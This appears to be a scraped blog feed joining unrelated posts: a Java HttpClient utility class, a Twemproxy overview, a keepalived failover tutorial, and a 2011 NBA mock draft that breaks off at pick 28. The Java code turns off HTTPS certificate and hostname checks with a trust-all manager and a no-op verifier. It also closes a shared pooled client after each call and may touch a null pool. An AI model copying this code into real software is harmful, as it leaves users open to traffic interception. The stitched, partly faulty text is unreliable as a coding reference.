private static CloseableHttpClient httpClient = null;

static {
httpClient = getHttpClient();
httpsClient = getHttpsClient();
}

public static CloseableHttpClient getHttpClient() {
try {
httpClient = HttpClients.custom()
.setConnectionManager(PoolManager.getHttpPoolInstance())
.setConnectionManagerShared(true)
.setDefaultRequestConfig(requestConfig())
.setRetryHandler(retryHandler())
.build();
} catch (Exception e) {
e.printStackTrace();
}
return httpClient;
}


public static CloseableHttpClient getHttpsClient() {
try {
//Secure Protocol implementation.
SSLContext ctx = SSLContext.getInstance("SSL");
//Implementation of a trust manager for X509 certificates
TrustManager x509TrustManager = new X509TrustManager() {
public void checkClientTrusted(X509Certificate[] xcs,
String string) throws CertificateException {
}
public void checkServerTrusted(X509Certificate[] xcs,
String string) throws CertificateException {
}
public X509Certificate[] getAcceptedIssuers() {
return null;
}
};
ctx.init(null, new TrustManager[]{x509TrustManager}, null);
// first set the global standard cookie policy
// RequestConfig requestConfig = RequestConfig.custom().setCookieSpec(CookieSpecs.STANDARD_STRICT).build();
ConnectionSocketFactory connectionSocketFactory = new SSLConnectionSocketFactory(ctx, hostnameVerifier);
Registry<ConnectionSocketFactory> socketFactoryRegistry = RegistryBuilder.<ConnectionSocketFactory>create()
.register("http", PlainConnectionSocketFactory.INSTANCE)
.register("https", connectionSocketFactory).build();
// set up the connection pool
httpsClient = HttpClients.custom()
.setConnectionManager(PoolsManager.getHttpsPoolInstance(socketFactoryRegistry))
.setConnectionManagerShared(true)
.setDefaultRequestConfig(requestConfig())
.setRetryHandler(retryHandler())
.build();
} catch (Exception e) {
e.printStackTrace();
}
return httpsClient;
}

// configure the request timeouts
// and the global standard cookie policy
public static RequestConfig requestConfig(){
RequestConfig requestConfig = RequestConfig.custom()
.setCookieSpec(CookieSpecs.STANDARD_STRICT)
.setConnectionRequestTimeout(20000)
.setConnectTimeout(20000)
.setSocketTimeout(20000)
.build();
return requestConfig;
}

public static HttpRequestRetryHandler retryHandler(){
// request retry handling
HttpRequestRetryHandler httpRequestRetryHandler = new HttpRequestRetryHandler() {
public boolean retryRequest(IOException exception,int executionCount, HttpContext context) {
if (executionCount >= 5) {// give up after 5 retries
return false;
}
if (exception instanceof NoHttpResponseException) {// retry if the server dropped the connection
return true;
}
if (exception instanceof SSLHandshakeException) {// do not retry SSL handshake exceptions
return false;
}
if (exception instanceof InterruptedIOException) {// timeout
return false;
}
if (exception instanceof UnknownHostException) {// target host unreachable
return false;
}
if (exception instanceof ConnectTimeoutException) {// connection timed out
return false;
}
if (exception instanceof SSLException) {// SSL handshake exception
return false;
}

HttpClientContext clientContext = HttpClientContext.adapt(context);
HttpRequest request = clientContext.getRequest();
// retry if the request is considered idempotent
if (!(request instanceof HttpEntityEnclosingRequest)) {
return true;
}
return false;
}
};
return httpRequestRetryHandler;
}



// create a HostnameVerifier
// works around javax.net.ssl.SSLException: hostname in certificate didn't match: <123.125.97.66> != <123.125.97.241>
static HostnameVerifier hostnameVerifier = new NoopHostnameVerifier(){
@Override
public boolean verify(String s, SSLSession sslSession) {
return super.verify(s, sslSession);
}
};


public static class PoolManager {
public static PoolingHttpClientConnectionManager clientConnectionManager = null;
private static int maxTotal = 200;
private static int defaultMaxPerRoute = 100;

private PoolManager(){
clientConnectionManager.setMaxTotal(maxTotal);
clientConnectionManager.setDefaultMaxPerRoute(defaultMaxPerRoute);
}

private static class PoolManagerHolder{
public static PoolManager instance = new PoolManager();
}

public static PoolManager getInstance() {
if(null == clientConnectionManager)
clientConnectionManager = new PoolingHttpClientConnectionManager();
return PoolManagerHolder.instance;
}

public static PoolingHttpClientConnectionManager getHttpPoolInstance() {
PoolManager.getInstance();
// System.out.println("getAvailable=" + clientConnectionManager.getTotalStats().getAvailable());
// System.out.println("getLeased=" + clientConnectionManager.getTotalStats().getLeased());
// System.out.println("getMax=" + clientConnectionManager.getTotalStats().getMax());
// System.out.println("getPending="+clientConnectionManager.getTotalStats().getPending());
return PoolManager.clientConnectionManager;
}


}

public static class PoolsManager {
public static PoolingHttpClientConnectionManager clientConnectionManager = null;
private static int maxTotal = 200;
private static int defaultMaxPerRoute = 100;

private PoolsManager(){
clientConnectionManager.setMaxTotal(maxTotal);
clientConnectionManager.setDefaultMaxPerRoute(defaultMaxPerRoute);
}

private static class PoolsManagerHolder{
public static PoolsManager instance = new PoolsManager();
}

public static PoolsManager getInstance(Registry<ConnectionSocketFactory> socketFactoryRegistry) {
if(null == clientConnectionManager)
clientConnectionManager = new PoolingHttpClientConnectionManager(socketFactoryRegistry);
return PoolsManagerHolder.instance;
}

public static PoolingHttpClientConnectionManager getHttpsPoolInstance(Registry<ConnectionSocketFactory> socketFactoryRegistry) {
PoolsManager.getInstance(socketFactoryRegistry);
// System.out.println("getAvailable=" + clientConnectionManager.getTotalStats().getAvailable());
// System.out.println("getLeased=" + clientConnectionManager.getTotalStats().getLeased());
// System.out.println("getMax=" + clientConnectionManager.getTotalStats().getMax());
// System.out.println("getPending="+clientConnectionManager.getTotalStats().getPending());
return PoolsManager.clientConnectionManager;
}

}

public static String httpPost(Map<String, String> request, String httpUrl){
String result = "";
CloseableHttpClient httpClient = getHttpClient();
try {
if(MapUtils.isEmpty(request))
throw new Exception("请求参数不能为空");
HttpPost httpPost = new HttpPost(httpUrl);
List<NameValuePair> nvps = new ArrayList<NameValuePair>();
for(Iterator<Map.Entry<String, String>> iterator=request.entrySet().iterator(); iterator.hasNext();){
Map.Entry<String, String> entry = iterator.next();
nvps.add(new BasicNameValuePair(entry.getKey(), entry.getValue()));
}
httpPost.setEntity(new UrlEncodedFormEntity(nvps, Consts.UTF_8));
System.out.println("Executing request: " + httpPost.getRequestLine());
CloseableHttpResponse response = httpClient.execute(httpPost);
result = EntityUtils.toString(response.getEntity());
System.out.println("Executing response: "+ result);
} catch (Exception e) {
throw new RuntimeException(e);
} finally {
try {
httpClient.close();
} catch (IOException e) {
e.printStackTrace();
}
}
return result;
}

public static String httpPost(String json, String httpUrl, Map<String, String> headers){
String result = "";
CloseableHttpClient httpClient = getHttpClient();
try {
if(StringUtils.isBlank(json))
throw new Exception("请求参数不能为空");
HttpPost httpPost = new HttpPost(httpUrl);
for(Iterator<Map.Entry<String, String>> iterator=headers.entrySet().iterator();iterator.hasNext();){
Map.Entry<String, String> entry = iterator.next();
Header header = new BasicHeader(entry.getKey(), entry.getValue());
httpPost.setHeader(header);
}
httpPost.setEntity(new StringEntity(json, Charset.forName("UTF-8")));
System.out.println("Executing request: " + httpPost.getRequestLine());
CloseableHttpResponse response = httpClient.execute(httpPost);
result = EntityUtils.toString(response.getEntity());
System.out.println("Executing response: "+ result);
} catch (Exception e) {
throw new RuntimeException(e);
} finally {
try {
httpClient.close();
} catch (IOException e) {
e.printStackTrace();
}
}
return result;
}

public static String httpGet(String httpUrl, Map<String, String> headers) {
String result = "";
CloseableHttpClient httpClient = getHttpClient();
try {
HttpGet httpGet = new HttpGet(httpUrl);
System.out.println("Executing request: " + httpGet.getRequestLine());
for(Iterator<Map.Entry<String, String>> iterator=headers.entrySet().iterator();iterator.hasNext();){
Map.Entry<String, String> entry = iterator.next();
Header header = new BasicHeader(entry.getKey(), entry.getValue());
httpGet.setHeader(header);
}
CloseableHttpResponse response = httpClient.execute(httpGet);
result = EntityUtils.toString(response.getEntity());
System.out.println("Executing response: "+ result);
} catch (Exception e) {
throw new RuntimeException(e);
} finally {
try {
httpClient.close();
} catch (IOException e) {
e.printStackTrace();
}
}
return result;
}


public static String httpGet(String httpUrl) {
String result = "";
CloseableHttpClient httpClient = getHttpClient();
try {
HttpGet httpGet = new HttpGet(httpUrl);
System.out.println("Executing request: " + httpGet.getRequestLine());
CloseableHttpResponse response = httpClient.execute(httpGet);
result = EntityUtils.toString(response.getEntity());
System.out.println("Executing response: "+ result);
} catch (Exception e) {
throw new RuntimeException(e);
} finally {
try {
httpClient.close();
} catch (IOException e) {
e.printStackTrace();
}
}
return result;
}





}

Maven dependencies:
  <!--httpclient-->
        <dependency>
            <groupId>org.apache.httpcomponents</groupId>
            <artifactId>httpclient</artifactId>
            <version>4.5.2</version>
        </dependency>
        <dependency>
            <groupId>org.apache.httpcomponents</groupId>
            <artifactId>httpcore</artifactId>
            <version>4.4.4</version>
        </dependency>
        <dependency>
            <groupId>org.apache.httpcomponents</groupId>
            <artifactId>httpmime</artifactId>
            <version>4.5.2</version>
        </dependency>

<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId>
<version>4.1</version>
</dependency>
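A minimal usage sketch of the utility class above (the URLs are placeholders; the demo assumes it lives in the same package as HttpClientUtil):

package com.abin.lee.util;

import java.util.HashMap;
import java.util.Map;

public class HttpClientUtilDemo {
    public static void main(String[] args) {
        // plain GET through the pooled HTTP client
        System.out.println(HttpClientUtil.httpGet("http://example.com/"));

        // form POST through the same pool
        Map<String, String> form = new HashMap<String, String>();
        form.put("name", "abin");
        System.out.println(HttpClientUtil.httpPost(form, "http://example.com/login"));
    }
}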


abin 2016-04-27 19:04

          Twemproxy, a proxy service for Redis    

1. Twemproxy overview

      When we have a large number of Redis or Memcached instances, we can usually only achieve clustered storage through client-side data-distribution algorithms (such as consistent hashing). Although Redis Cluster has been released with Redis 2.6, it is not yet mature enough for a production environment. Until the official Redis Cluster solution arrives, we can implement clustered storage by way of a proxy.

       Twitter runs one of the world's largest Redis clusters, deployed to serve timeline data to its users. Twitter's Open Source department has provided Twemproxy.

     Twemproxy, also called nutcracker, is a Redis and Memcached proxy server open-sourced by Twitter. Redis is a highly efficient cache server with great practical value, but once you run many of them you want some way to manage them uniformly, avoiding the looseness of every application and every client managing its own connections, while gaining a degree of control.

      Twemproxy is a fast single-threaded proxy supporting the Memcached ASCII protocol and the newer Redis protocol.

     It is written entirely in C and licensed under the Apache 2.0 License. The project works on Linux but cannot be compiled on OS X, because it depends on the epoll API.

      By introducing a proxy layer, Twemproxy manages and distributes across multiple backend Redis or Memcached instances in a unified way, so the application only has to talk to Twemproxy, without caring how many real Redis or Memcached stores sit behind it.

2. Twemproxy features:

    • Automatic ejection of failed nodes

      • The time before reconnecting to a node can be configured
      • The number of failures after which a node is removed can be configured
      • This mode is suitable for cache storage
    • Support for HashTags

      • With HashTags you can force two keys to hash to the same instance
    • Fewer direct connections to Redis

      • Keeps long-lived connections to Redis
      • The number of connections between the proxy and each backend Redis can be configured
    • Automatic sharding across multiple backend Redis instances

      • Multiple hash algorithms: consistent hashing is supported with different strategies and hash functions
      • Weights can be assigned to backend instances
    • No single point of failure

      • Multiple proxy layers can be deployed in parallel; clients automatically pick an available one
    • Support for Redis pipelining requests

           Requests can be streamed and batched, reducing round-trip overhead

    • Status monitoring

      • A status-monitoring IP and port can be configured; querying them returns status information as a JSON string
      • The refresh interval of the monitoring information can be configured
    • High throughput

      • Connection reuse and memory reuse
      • Multiple requests are combined into Redis pipelining requests sent to Redis together

     Alternatively, one could modify the Redis source code and extract the front half of Redis as an intermediate proxy layer. Either way, concurrency efficiency ultimately comes from the epoll event mechanism in Linux; nutcracker itself also uses epoll, and it performs very well in performance tests.

3. Twemproxy problems and shortcomings


Because of how it works, Twemproxy has some limitations, for example:
  • No support for operations on multiple values, such as set intersection/union/difference (MGET and DEL are exceptions)
  • No support for Redis transactions
  • Error reporting is still incomplete
  • No support for the SELECT operation

4. Installation and configuration 

The detailed installation steps can be found on GitHub: https://github.com/twitter/twemproxy
The main commands for installing Twemproxy are as follows: 
apt-get install automake  
apt-get install libtool  
git clone git://github.com/twitter/twemproxy.git  
cd twemproxy  
autoreconf -fvi  
./configure --enable-debug=log  
make  
src/nutcracker -h

With the commands above, installation is complete. Next comes the concrete configuration; below is a typical one: 
    redis1:  
      listen: 127.0.0.1:6379 # the port Twemproxy listens on  
      redis: true # whether this is a Redis proxy  
      hash: fnv1a_64 # the hash function to use  
      distribution: ketama # the distribution (hash ring) algorithm  
      auto_eject_hosts: true # whether to temporarily eject nodes that stop responding  
      timeout: 400 # timeout (milliseconds)  
      server_retry_timeout: 2000 # retry interval (milliseconds)  
      server_failure_limit: 1 # number of failures after which a node is ejected  
      servers: # all the Redis nodes below (IP:port:weight)  
       - 127.0.0.1:6380:1  
       - 127.0.0.1:6381:1  
       - 127.0.0.1:6382:1  
      
    redis2:  
      listen: 0.0.0.0:10000  
      redis: true  
      hash: fnv1a_64  
      distribution: ketama  
      auto_eject_hosts: false  
      timeout: 400  
      servers:  
       - 127.0.0.1:6379:1  
       - 127.0.0.1:6380:1  
       - 127.0.0.1:6381:1  
       - 127.0.0.1:6382:1 

You can run several Twemproxy instances at the same time, all of them serving reads and writes, so your application can completely avoid the so-called single point of failure.
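To try it out, save the configuration above to a file, validate it, start nutcracker, and point a Redis client at the proxy port (a sketch; the config path is an example):

src/nutcracker -t -c conf/nutcracker.yml    # validate the configuration
src/nutcracker -d -c conf/nutcracker.yml    # run as a daemon

redis-cli -p 6379 set user:1 abin           # talk to the proxy as if it were a single Redis
redis-cli -p 6379 get user:1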


http://blog.csdn.net/hguisu/article/details/9174459/


abin 2015-11-03 19:30

          Deploying Highly Available Virtual Interfaces With Keepalived   

Linux is a powerhouse when it comes to networking, and provides a full featured and high performance network stack. When combined with web front-ends such as HAProxy, lighttpd, Nginx, or Apache, or your favorite application server, Linux is a killer platform for hosting web applications. Keeping these applications up and operational can sometimes be a challenge, especially in this age of horizontally scaled infrastructure and commodity hardware. But don't fret, since there are a number of technologies that can assist with making your applications and network infrastructure fault tolerant.

One of these technologies, keepalived, provides interface failover and the ability to perform application-layer health checks. When these capabilities are combined with the Linux Virtual Server (LVS) project, a fault in an application will be detected by keepalived, and the virtual interfaces that are accessed by clients can be migrated to another available node. This article will provide an introduction to keepalived, and will show how to configure interface failover between two or more nodes. Additionally, the article will show how to debug problems with keepalived and VRRP.

What Is Keepalived?


The keepalived project provides a keepalive facility for Linux servers. This keepalive facility consists of a VRRP implementation to manage virtual routers (aka virtual interfaces), and a health check facility to determine if a service (web server, samba server, etc.) is up and operational. If a service fails a configurable number of health checks, keepalived will fail a virtual router over to a secondary node. While useful in its own right, keepalived really shines when combined with the Linux Virtual Server project. This article will focus on keepalived, and a future article will show how to integrate the two to create a fault tolerant load-balancer.

Installing KeepAlived From Source Code


Before we dive into configuring keepalived, we need to install it. Keepalived is distributed as source code, and is available in several package repositories. To install from source code, you can execute wget or curl to retrieve the source, and then run "configure", "make" and "make install" to compile and install the software:

$ wget http://www.keepalived.org/software/keepalived-1.1.17.tar.gz
$ tar xfvz keepalived-1.1.17.tar.gz
$ cd keepalived-1.1.17
$ ./configure --prefix=/usr/local
$ make && make install

In the example above, the keepalived daemon will be compiled and installed as /usr/local/sbin/keepalived.

Configuring KeepAlived


The keepalived daemon is configured through a text configuration file, typically named keepalived.conf. This file contains one or more configuration stanzas, which control notification settings, the virtual interfaces to manage, and the health checks to use to test the services that rely on the virtual interfaces. Here is a sample annotated configuration that defines two virtual IP addresses to manage, and the individuals to contact when a state transition or fault occurs:

# Define global configuration directives
global_defs {
    # Send an e-mail to each of the following
    # addresses when a failure occurs
    notification_email {
        matty@prefetch.net
        operations@prefetch.net
    }
    # The address to use in the From: header
    notification_email_from root@VRRP-director1.prefetch.net

    # The SMTP server to route mail through
    smtp_server mail.prefetch.net

    # How long to wait for the mail server to respond
    smtp_connect_timeout 30

    # A descriptive name describing the router
    router_id VRRP-director1
}

# Create a VRRP instance
VRRP_instance VRRP_ROUTER1 {

    # The initial state to transition to. This option isn't
    # really all that valuable, since an election will occur
    # and the host with the highest priority will become
    # the master. The priority is controlled with the priority
    # configuration directive.
    state MASTER

    # The interface keepalived will manage
    interface br0

    # The virtual router id number to assign the routers to
    virtual_router_id 100

    # The priority to assign to this device. This controls
    # who will become the MASTER and BACKUP for a given
    # VRRP instance.
    priority 100

    # How many seconds to wait until a gratuitous arp is sent
    garp_master_delay 2

    # How often to send out VRRP advertisements
    advert_int 1

    # Execute a notification script when a host transitions to
    # MASTER or BACKUP, or when a fault occurs. The arguments
    # passed to the script are:
    #  $1 - "GROUP"|"INSTANCE"
    #  $2 = name of group or instance
    #  $3 = target state of transition
    # Sample: VRRP-notification.sh VRRP_ROUTER1 BACKUP 100
    notify "/usr/local/bin/VRRP-notification.sh"

    # Send an SMTP alert during a state transition
    smtp_alert

    # Authenticate the remote endpoints via a simple
    # username/password combination
    authentication {
        auth_type PASS
        auth_pass 192837465
    }

    # The virtual IP addresses to float between nodes. The
    # label statement can be used to bring an interface
    # online to represent the virtual IP.
    virtual_ipaddress {
        192.168.1.100 label br0:100
        192.168.1.101 label br0:101
    }
}

The configuration file listed above is self explanatory, so I won't go over each directive in detail. I will point out a couple of items:

  • Each host is referred to as a director in the documentation, and each director can be responsible for one or more VRRP instances
  • Each director will need its own copy of the configuration file, and the router_id, priority, etc. should be adjusted to reflect the nodes name and priority relative to other nodes
  • To force a specific node to master a virtual address, make sure the director's priority is higher than the other virtual routers
  • If you have multiple VRRP instances that need to failover together, you will need to add each instance to a VRRP_sync_group
  • The notification script can be used to generate custom syslog messages, or to invoke some custom logic (e.g., restart an app) when a state transition or fault occurs; a minimal example script is sketched after this list
  • The keepalived package comes with numerous configuration examples, which show how to configure numerous aspects of the server
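Here is a sketch of what such a notification script might look like (a hypothetical example, not part of the keepalived distribution; the arguments match the comment in the sample configuration above):

#!/bin/sh
# /usr/local/bin/VRRP-notification.sh
# $1 - "GROUP" or "INSTANCE", $2 - name of the group or instance,
# $3 - target state of the transition (MASTER/BACKUP/FAULT)
TYPE=$1
NAME=$2
STATE=$3

logger -t keepalived "Transition: ${TYPE} ${NAME} -> ${STATE}"

case "$STATE" in
    MASTER)        /etc/init.d/myapp start ;;   # example hook: start an app on promotion
    BACKUP|FAULT)  /etc/init.d/myapp stop  ;;
esac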

Starting Keepalived


Keepalived can be executed from an RC script, or started from the command line. The following example will start keepalived using the configuration file /usr/local/etc/keepalived.conf:

$ keepalived -f /usr/local/etc/keepalived.conf 

If you need to debug keepalived issues, you can run the daemon with the "--dont-fork", "--log-console" and "--log-detail" options:

$ keepalived -f /usr/local/etc/keepalived.conf --dont-fork --log-console --log-detail 

These options will stop keepalived from forking, and will provide additional logging data. Using these options is especially useful when you are testing out new configuration directives, or debugging an issue with an existing configuration file.

Locating The Router That is Managing A Virtual IP


To see which director is currently the master for a given virtual interface, you can check the output from the ip utility:

VRRP-director1$ ip addr list br0
5: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN
    link/ether 00:24:8c:4e:07:f6 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.6/24 brd 192.168.1.255 scope global br0
    inet 192.168.1.100/32 scope global br0:100
    inet 192.168.1.101/32 scope global br0:101
    inet6 fe80::224:8cff:fe4e:7f6/64 scope link
       valid_lft forever preferred_lft forever

VRRP-director2$ ip addr list br0
5: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN
    link/ether 00:24:8c:4e:07:f6 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.7/24 brd 192.168.1.255 scope global br0
    inet6 fe80::224:8cff:fe4e:7f6/64 scope link
       valid_lft forever preferred_lft forever

In the output above, we can see that the virtual interfaces 192.168.1.100 and 192.168.1.101 are currently active on VRRP-director1.

Troubleshooting Keepalived And VRRP


The keepalived daemon will log to syslog by default. Log entries will range from entries that show when the keepalive daemon started, to entries that show state transitions. Here are a few sample entries that show keepalived starting up, and the node transitioning a VRRP instance to the MASTER state:

Jul  3 16:29:56 disarm Keepalived: Starting Keepalived v1.1.17 (07/03,2009)
Jul  3 16:29:56 disarm Keepalived: Starting VRRP child process, pid=1889
Jul  3 16:29:56 disarm Keepalived_VRRP: Using MII-BMSR NIC polling thread...
Jul  3 16:29:56 disarm Keepalived_VRRP: Registering Kernel netlink reflector
Jul  3 16:29:56 disarm Keepalived_VRRP: Registering Kernel netlink command channel
Jul  3 16:29:56 disarm Keepalived_VRRP: Registering gratutious ARP shared channel
Jul  3 16:29:56 disarm Keepalived_VRRP: Opening file '/usr/local/etc/keepalived.conf'.
Jul  3 16:29:56 disarm Keepalived_VRRP: Configuration is using : 62990 Bytes
Jul  3 16:29:57 disarm Keepalived_VRRP: VRRP_Instance(VRRP_ROUTER1) Transition to MASTER STATE
Jul  3 16:29:58 disarm Keepalived_VRRP: VRRP_Instance(VRRP_ROUTER1) Entering MASTER STATE
Jul  3 16:29:58 disarm Keepalived_VRRP: Netlink: skipping nl_cmd msg...

If you are unable to determine the source of a problem with the system logs, you can use tcpdump to display the VRRP advertisements that are sent on the local network. Advertisements are sent to a reserved VRRP multicast address (224.0.0.18), so the following filter can be used to display all VRRP traffic that is visible on the interface passed to the "-i" option:

$ tcpdump -vvv -n -i br0 host 224.0.0.18
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on br0, link-type EN10MB (Ethernet), capture size 96 bytes

10:18:23.621512 IP (tos 0x0, ttl 255, id 102, offset 0, flags [none], proto VRRP (112), length 40) \
                192.168.1.6 > 224.0.0.18: VRRPv2, Advertisement, vrid 100, prio 100, authtype simple,
                intvl 1s, length 20, addrs: 192.168.1.100 auth "19283746"

10:18:25.621977 IP (tos 0x0, ttl 255, id 103, offset 0, flags [none], proto VRRP (112), length 40) \
                192.168.1.6 > 224.0.0.18: VRRPv2, Advertisement, vrid 100, prio 100, authtype simple,
                intvl 1s, length 20, addrs: 192.168.1.100 auth "19283746"
                        .........

The output contains several pieces of data that can be useful for debugging problems:

  • authtype - the type of authentication in use (authentication configuration directive)
  • vrid - the virtual router id (virtual_router_id configuration directive)
  • prio - the priority of the device (priority configuration directive)
  • intvl - how often to send out advertisements (advert_int configuration directive)
  • auth - the authentication token sent (auth_pass configuration directive)

Conclusion


In this article I described how to set up a host to use the keepalived daemon, and provided a sample configuration file that can be used to fail over virtual interfaces between servers. Keepalived has a slew of options not covered here; I will refer you to the keepalived source code and documentation for additional details.




          Casper's Final 2011 NBA Mock Draft   
Final 2011 Mock Draft with odds that the pick is dealt and brief summaries.

Many thanks to the following people for various rumors:
Jonathan Givony (@DraftExpress)
Chad Ford (@chadfordinsider)
Scott Schroeder (@ScottSchroeder)

Don't forget to check out my Final Big Board

Enjoy!

1. Cleveland (from LAC) - Kyrie Irving (PG), Duke:
Odds pick is dealt: Zero
The Cavs say “Thank you” to the Clippers for gifting them a franchise PG. Off-the-court drama could steal some of his spotlight on draft night.

2. Minnesota - Derrick Williams (PF/SF), Arizona:
Odds pick is dealt: 50%
The Wolves are stuck with a tough choice to make after they take Williams, either keep him and figure out how to make the rotation work with a forward-heavy roster, or deal him for a SG or C. There are so many rumors floating about, that I can’t do anything but label this 50:50.

3. Utah (from NJN) - Brandon Knight (PG/SG), Kentucky:
Odds pick is dealt: Minimal
Do the Jazz go guard here or at #12? That’s the million dollar question. It appears that they have fallen in love with Knight, but they are open to selecting Kanter or Vesely as well.

4. Cleveland - Enes Kanter (C/PF), Turkey:
Odds pick is dealt: 40%
After going Kyrie with their first pick, the Cavs look at going with a C with their second pick. With the selection of Kanter they will have a good PnR partner for Kyrie - and he’ll have the luxury of being able to develop while playing behind Varejao... something which may be needed given his situation last year. They could also move this pick to a team wanting to bid for Kanter, and then move back and take Valanciunas - something to keep an eye on.

5. Toronto - Kemba Walker (PG), Connecticut:
Odds pick is dealt: Minimal
Reports coming out of Toronto are muddled, and there are seemingly 5-6 prospects tied to them at this spot. The one thing I believe is that if Knight is here, he’s the pick - problem is he likely won’t be on the board. Therefore they take Walker who gives them a tough-nosed PG who can produce on both ends of the floor and is a leader in every sense of the word. Dwane Casey should love him.

6. Washington - Jan Vesely (SF/PF), KK Partizan Belgrade:
Odds pick is dealt: 40%
All reports point to the Wizards absolutely loving Vesely. If he can refine his shot from deep, watch out - Wall just found himself an uber-athletic Forward to run the floor with him. If they move the pick it’s going to be to land Kanter.

7. Sacramento - Kawhi Leonard (SF), San Diego State:
Odds pick is dealt: 25%
The Kings want an impact player at this spot, and while they could give Fredette a look because of his offensive fit next to Evans, I think they go with Leonard. Kawhi is able to be slotted in at SF and they will be able to cover up his offensive flaws while hopefully reaping the benefits of his defense and hustle. It’s possible that they move this pick to a team wanting Valanciunas.

8. Detroit - Jonas Valanciunas (C), Lietuvos Rytas:
Odds pick is dealt: 50%
The Jonas slide stops at #8. Will he stay with the Pistons? He could... but Monroe and Jonas are a questionable pairing and they may want some immediate help given the rumors that JV will have to stay at least one season in Europe before coming over. Whatever the case may be, this could be considered great value.

9. Charlotte - Marcus Morris (PF/SF), Kansas:
Odds pick is dealt: Minimal
Charlotte reportedly wants to come out of this draft with an NBA ready player who can help spread the floor. Enter Marcus Morris who can score efficiently from everywhere on the court and can possibly play both Forward spots... very safe choice.

10. Milwaukee - Alec Burks (SG), Colorado:
Odds pick is dealt: 40%
In dire need of improved efficiency out of the backcourt after ranking dead last in offensive efficiency in 2010-11, Milwaukee looks to find a SG who can fill it up. With Jennings loving to chuck up 3’s, they need a guy like Burks alongside him to take it to the rim. If they can move down and add more picks, it’s still possible they can get their guy.

11. Golden State - Chris Singleton (SF/PF), Florida State:
Odds pick is dealt: 25%
Reports coming out of Golden State point to West loving Thompson, but they also have their coach and GM preaching defense. I think they have to go defense here, preferably on the wing. Singleton is able to guard SG, SF, or PF and has also shown the ability to get out and run or knock down 3s - thus making him a good fit for the Warriors.

12. Utah - Marshon Brooks (SG), Providence:
Odds pick is dealt: 60%
The Jazz are left staring Jimmer in the face and are basically forced to pass on a guy hometown fans love. They could move up or down, but if they stay at 12, they could tab Marshon as a NBA-ready scorer with great length.

13. Phoenix - Tristan Thompson (PF), Texas:
Odds pick is dealt: 25%
Reports are that the Suns pick will come from a workout that featured Shumpert, the Morris twins, Singleton, Thompson, and Jimmer. I think Thompson gets the nod as what could turn out to be an upgrade to their PF spot right away despite being raw. Look for them to make a move to acquire a PG (Flynn?) in a deal that might involve this pick.

14. Houston - Bismack Biyombo (C/PF), Baloncesto Fuenlabrada:
Odds pick is dealt: 40%
Houston is still in need of a C, despite trading for Thabeet last season. In Biyombo, they acquire a guy with immense upside on the defensive end, but is as raw as can be offensively. That works for new coach Kevin McHale who wants defense and already has a guy in Scola who can get him buckets in the paint. If they can find a partner in the mid-lotto to trade with, they’ll do it.

15. Indiana - Jimmer Fredette (PG/SG), BYU:
Odds pick is dealt: Minimal
Coming off a nice season that saw them back in the playoffs for the first time in five years, Indiana takes Fredette who, despite Collison being the starter, rounds out what could be a nice backcourt rotation as an outside shooter who can get incredibly hot.

16. Philadelphia - Klay Thompson (SG/SF), Washington State:
Odds pick is dealt: 25%
Very little is coming out of Philly about the draft, some of it may have to do with them having trouble getting prospects to work out for them, but there’s also the Iguodala rumors. I think if they move Iggy, they should take a wing that can spread the floor and work off the ball - enter Klay Thompson, who has been impressing in workouts.

17. New York - Iman Shumpert (SG), Georgia Tech:
Odds pick is dealt: Minimal
The Knicks need defense first and foremost. In Iman, they get a versatile defender with great tools while also being able to handle the ball a little. Word is that Knicks want him, and odds are there won’t be teams ahead of them who are going to spoil their party. Rumor has it they may want to move up and nab Biyombo - but what do they have to offer? I think they're stuck.

18. Washington (from ATL) - Donatas Motiejunas (PF/C), Benetton Treviso:
Odds pick is dealt: 50%
The Wizards nab Motiejunas who has great upside and can score in a variety of ways. He could be an eventual replacement for Blatche, and at this point represents solid value. As this isn’t an excellent fit, the Wizards could move the pick - especially if they move up to get Kanter.

19. Charlotte (from NOH) - Markieff Morris (PF), Kansas:
Odds pick is dealt: Minimal
The Bobcats nab the second Morris twin, hoping that their chemistry carries over. This isn’t just a sentimental pick, however - Markieff should be a good energy big off the bench that provides defense and rebounding, while also fitting the “safe” mantra that Charlotte is advocating.

20. Minnesota (from MEM) - Jordan Hamilton (SF/SG), Texas:
Odds pick is dealt: Extremely high
The Timberwolves really don’t have room to bring in two rookies as well as Rubio. Therefore, this pick does not represent who I think the Wolves will keep, but who reports consider BPA - Jordan Hamilton.

21. Portland - Nikola Vucevic (C), USC:
Odds pick is dealt: 40%
Portland lacks healthy size. Although Vucevic overlaps with LMA’s skillset, he should be able to play right away and reportedly has been doing well in workouts. Rumors are that Portland wants a vet, so I wouldn’t be surprised to see this moved in a package to acquire one.

22. Denver - Kenneth Faried (PF), Morehead State:
Odds pick is dealt: 25%
Faried fits the up-tempo style of play Denver likes to play and gives the Nuggets a strong rebounder and defender for a team that could possibly lose two of their bigs to free agency - not to mention they have a lot of scorers on the roster so his biggest weakness is covered up.

23. Houston (from ORL) - Tobias Harris (SF/PF), Tennessee:
Odds pick is dealt: 75%
Houston is another team that doesn’t really have room to bring in more rookies, however I could see them keeping the pick if someone like Harris fell. While he’s not similar to Battier as some claim, he is a very smart player who could see rotation minutes right away despite currently being 18.

24. Oklahoma City - Davis Bertans (SF), Union Olimpija Ljubljana:
Odds pick is dealt: 25%
The Thunder really have no rotational needs that can be satisfied with this pick, so they take Bertans who can be stashed overseas for another year or two before coming over.

25. Boston - Jeremy Tyler (C/PF), Tokyo Apache:
Odds pick is dealt: 40%
I have no idea what Boston will do here, because they only have a year or two left of their aging superstars, and then it’s just Rondo and maybe Green. Because of that, I’ll do something nonsensical and stick them with Tyler who is arguably the biggest unknown of the draft, but has great physical tools.

26. Dallas - Justin Harper (PF/SF), Richmond:
Odds pick is dealt: 25%
The Mavs really lose offensive firepower when Dirk goes to the bench - to the point where it’s going to be a problem. Yes, they are in “win now” mode, but I could see Harper playing a role on this team next year... possibly an important one off the bench.

27. New Jersey (from LAL) - Tyler Honeycutt (SF/SG), UCLA:
Odds pick is dealt: 75%
It’s being reported that the Nets want to move up from this spot, and are trying to use #35 in order to do so. However, if they do not move up, I think Honeycutt makes sense as a versatile wing that is a bit of a project.

28. Chicago (from MIA) - Charles Jenkins (PG/SG), Hofstra:
